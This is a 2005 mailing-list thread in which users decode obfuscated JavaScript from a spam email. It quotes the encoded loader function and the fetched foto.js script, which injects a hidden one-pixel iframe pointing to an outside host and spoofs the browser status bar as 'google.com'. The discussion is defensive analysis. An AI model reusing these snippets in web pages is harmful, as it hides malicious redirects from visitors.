On Thu, 2005-06-02 at 17:06 -0400, Darryl Clarke wrote: > On 6/2/05, Steve Lamb <[EMAIL PROTECTED]> wrote: > > michael wrote: > > > how do i decypher what the following HTML/javascript attempts (original > > > 'write' was all one line)? > > > > Personally, I used Python's urllib.unquote and got the following: > > > > <SCRIPT LANGUAGE="javascript">document.write('empty..');</SCRIPT><script > > language="javascript">function dF(s){var > > s1=unescape(s.substr(0,s.length-1)); > > var > > t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script> > > > > > dF('*8HXHWNUY*75QFSLZFLJ*8I*77of% > > > 7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')</script> > > > > Which is then fed the above segment to decode. Don't feel like digging > > into the above javascript to make a Python equivolant decoder for that > > section. Maybe someone else will jump in? :D > > > > That final segment decodes to this: > > SCRIPT LANGUAGE="javascript" SRC="foto.js"> // SAMPLE SCRIPT #2 - > CALLING AN EXTERNAL JS FILE </SCRIPT > > which, unless there was a base reference issued in the actual spam, > leads nowhere. :) >
well i can 'wget' the foto.js from the site which is (if anybody is interested!) a bit too simple to decode but those up for the challenge could decypher the index.php url = "http://www.trafficpro.us/index.php"; qwe = ' di'+'spl'+'ay:n'+'one'+';}</s'+'ty'+'le>'; rty = '" FR'+'AMEB'+'ORD'+'ER="0" WIDTH=1 HEIGHT=1'+'0% ></I'+'F'+'RA'+'ME>'; uio = '<s'+'tyl'+'e type="text/css">'; asd = '<IF'+'RA'+'ME SRC="'; fgh = ' .t'+'ex'+'t {vi'+'sib'+'ili'+'ty:h'+'idd'+'en;'; a = asd+url+rty; b = uio+fgh+qwe; document.write (a); document.write (b); self.focus(); setInterval("window.status='google.com'",7); > -- > ~ Darryl ~ [EMAIL PROTECTED] > http://smartssa.com / http://darrylclarke.com > -- Michael Bane Atmospheric Physics Group University of Manchester -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]